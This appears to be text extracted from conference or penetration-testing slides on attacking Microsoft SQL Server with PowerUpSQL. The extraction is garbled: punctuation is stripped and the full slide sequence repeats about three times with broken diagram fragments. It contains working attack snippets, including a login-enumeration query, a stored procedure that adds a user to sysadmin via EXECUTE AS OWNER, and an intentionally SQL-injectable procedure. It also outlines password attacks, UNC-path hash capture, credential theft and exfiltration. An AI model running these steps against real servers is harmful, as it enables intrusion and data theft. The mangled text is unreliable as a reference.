2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Unauthenticated List from file TCP port scan UDP port scan UDP broadcast Azure DNS dictionary attack (xdatabaseswindowsnet) Azure DNS lookup via public resources
Local User Services Registry entries
Domain User Service Principal Names Azure Portal PowerShell Modules
Find SQL Servers PowerUpSQLAttacker Perspective PowerUpSQL Function
Unauthenticated Get-SQLInstanceFile
Unauthenticated Get-SQLInstanceUDPScan
Local User Get-SQLInstanceLocal
Domain User Get-SQLInstanceDomain
Blog httpsblognetspicomblindly-discover-sql-server-instances-powerupsql
EscalatingPrivileges
Unauthenticated Domain User to SQL Login
Testing Login Access TechniquesWhat credentials can I use to log into discovered SQL Servers
Attacker Perspective Attack Technique
Unauthenticated Dictionary attacks using common user names and passwords
Unauthenticated Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account
Attempt to login using the current account
Testing Login Access PowerUpSQL CMDsWhat PowerUpSQL functions can I use to test for successful logins
Attack Technique PowerUpSQL Function
Dictionary Attack Invoke-SQLAuditWeakLoginPw
Default Password Test Invoke-SQLAuditDefaultLoginPw
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Unauthenticated List from file TCP port scan UDP port scan UDP broadcast Azure DNS dictionary attack (xdatabaseswindowsnet) Azure DNS lookup via public resources
Local User Services Registry entries
Domain User Service Principal Names Azure Portal PowerShell Modules
Find SQL Servers PowerUpSQLAttacker Perspective PowerUpSQL Function
Unauthenticated Get-SQLInstanceFile
Unauthenticated Get-SQLInstanceUDPScan
Local User Get-SQLInstanceLocal
Domain User Get-SQLInstanceDomain
Blog httpsblognetspicomblindly-discover-sql-server-instances-powerupsql
EscalatingPrivileges
Unauthenticated Domain User to SQL Login
Testing Login Access TechniquesWhat credentials can I use to log into discovered SQL Servers
Attacker Perspective Attack Technique
Unauthenticated Dictionary attacks using common user names and passwords
Unauthenticated Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account
Attempt to login using the current account
Testing Login Access PowerUpSQL CMDsWhat PowerUpSQL functions can I use to test for successful logins
Attack Technique PowerUpSQL Function
Dictionary Attack Invoke-SQLAuditWeakLoginPw
Default Password Test Invoke-SQLAuditDefaultLoginPw
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Unauthenticated List from file TCP port scan UDP port scan UDP broadcast Azure DNS dictionary attack (xdatabaseswindowsnet) Azure DNS lookup via public resources
Local User Services Registry entries
Domain User Service Principal Names Azure Portal PowerShell Modules
Find SQL Servers PowerUpSQLAttacker Perspective PowerUpSQL Function
Unauthenticated Get-SQLInstanceFile
Unauthenticated Get-SQLInstanceUDPScan
Local User Get-SQLInstanceLocal
Domain User Get-SQLInstanceDomain
Blog httpsblognetspicomblindly-discover-sql-server-instances-powerupsql
EscalatingPrivileges
Unauthenticated Domain User to SQL Login
Testing Login Access TechniquesWhat credentials can I use to log into discovered SQL Servers
Attacker Perspective Attack Technique
Unauthenticated Dictionary attacks using common user names and passwords
Unauthenticated Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account
Attempt to login using the current account
Testing Login Access PowerUpSQL CMDsWhat PowerUpSQL functions can I use to test for successful logins
Attack Technique PowerUpSQL Function
Dictionary Attack Invoke-SQLAuditWeakLoginPw
Default Password Test Invoke-SQLAuditDefaultLoginPw
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Unauthenticated List from file TCP port scan UDP port scan UDP broadcast Azure DNS dictionary attack (xdatabaseswindowsnet) Azure DNS lookup via public resources
Local User Services Registry entries
Domain User Service Principal Names Azure Portal PowerShell Modules
Find SQL Servers PowerUpSQLAttacker Perspective PowerUpSQL Function
Unauthenticated Get-SQLInstanceFile
Unauthenticated Get-SQLInstanceUDPScan
Local User Get-SQLInstanceLocal
Domain User Get-SQLInstanceDomain
Blog httpsblognetspicomblindly-discover-sql-server-instances-powerupsql
EscalatingPrivileges
Unauthenticated Domain User to SQL Login
Testing Login Access TechniquesWhat credentials can I use to log into discovered SQL Servers
Attacker Perspective Attack Technique
Unauthenticated Dictionary attacks using common user names and passwords
Unauthenticated Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account
Attempt to login using the current account
Testing Login Access PowerUpSQL CMDsWhat PowerUpSQL functions can I use to test for successful logins
Attack Technique PowerUpSQL Function
Dictionary Attack Invoke-SQLAuditWeakLoginPw
Default Password Test Invoke-SQLAuditDefaultLoginPw
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
